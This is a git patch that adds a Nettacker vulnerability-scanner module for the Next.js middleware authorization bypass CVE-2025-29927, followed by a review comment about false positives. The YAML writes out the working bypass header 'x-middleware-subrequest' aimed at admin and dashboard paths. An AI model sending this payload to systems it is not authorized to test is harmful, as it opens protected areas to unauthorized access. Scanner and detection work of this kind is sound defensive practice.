From dafc202de592d87de9a223c6c526e8a6749dc515 Mon Sep 17 00:00:00 2001
From: Dami99-b
Date: Mon, 30 Mar 2026 23:03:33 +0100
Subject: [PATCH] feat: add vuln module for NextJS middleware bypass CVE-2025-29927 (CISA KEV)

- Sends GET request with x-middleware-subrequest header to detect auth bypass
- Targets protected paths: admin, dashboard, api/admin
- Matches HTTP 200 + Next.js body signatures
- Removed static path to prevent false positives on patched systems
- Fixes #1449
---
.../modules/vuln/nextjs_cve_2025_29927.yaml | 57 +++++++++++++++++++
1 file changed, 57 insertions(+)
create mode 100644 nettacker/modules/vuln/nextjs_cve_2025_29927.yaml

diff --git a/nettacker/modules/vuln/nextjs_cve_2025_29927.yaml b/nettacker/modules/vuln/nextjs_cve_2025_29927.yaml
new file mode 100644
index 000000000..67dcb5f7c
--- /dev/null
+++ b/nettacker/modules/vuln/nextjs_cve_2025_29927.yaml
@@ -0,0 +1,57 @@
+info:
+ name: nextjs_cve_2025_29927_vuln
+ author: Prosper Okah
+ severity: 9
+ description: CVE-2025-29927 is an unauthenticated authorization bypass vulnerability in Next.js. The framework uses an internal header x-middleware-subrequest to track recursive middleware calls. In affected versions (prior to 12.3.5, 13.5.9, 14.2.25, 15.2.3), this header is not stripped from incoming external requests, allowing attackers to bypass authentication and access control middleware entirely by setting this header in any HTTP request.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2025-29927
+ - https://nextjs.org/blog/cve-2025-29927
+ - https://github.com/EQSTLab/CVE-2025-29927
+ - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
+ profiles:
+ - vuln
+ - http
+ - critical_severity
+ - cve2025
+ - cve
+ - nextjs
+ - auth_bypass
+ - middleware_bypass
+
+payloads:
+ - library: http
+ steps:
+ - method: get
+ timeout: 3
+ headers:
+ User-Agent: "{user_agent}"
+ x-middleware-subrequest: "middleware:middleware:middleware:middleware:middleware"
+ ssl: false
+ url:
+ nettacker_fuzzer:
+ input_format: "{{schema}}://{target}:{{ports}}/{{path}}"
+ prefix: ""
+ suffix: ""
+ interceptors:
+ data:
+ path:
+ - "admin"
+ - "dashboard"
+ - "api/admin"
+ schema:
+ - "http"
+ - "https"
+ ports:
+ - 80
+ - 443
+ - 3000
+ - 8080
+ response:
+ condition_type: and
+ conditions:
+ status_code:
+ regex: '200'
+ reverse: false
+ content:
+ regex: "__NEXT_DATA__|_next/|next/dist"
+ reverse: false
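Review bot: The `response` conditions at the end of the hunk (`status_code` regex `'200'` and `content` regex `"__NEXT_DATA__|_next/|next/dist"`) will also match a Next.js deployment that simply serves `/admin`, `/dashboard` or `/api/admin` publicly, because the single step never sends a control request without the `x-middleware-subrequest` header, so an unprotected route or a patched server with a public page at that path is reported as vulnerable with `severity: 9`. If the `http` library can chain a second step, a negative control (same URL without the header, expected not to return 200) would make the match differential; otherwise the limitation should at least be stated in `description`, for example by appending `Detection is a single request matched on a 200 response with Next.js body markers; verify that the same path is not reachable without the header before treating a hit as confirmed.` The `api/admin` entry also seems unlikely to return HTML containing `_next/` or `__NEXT_DATA__`, so in practice it can probably only match through the `next/dist` alternative; a short comment above the `path` list saying it is a best-effort probe would help maintainers.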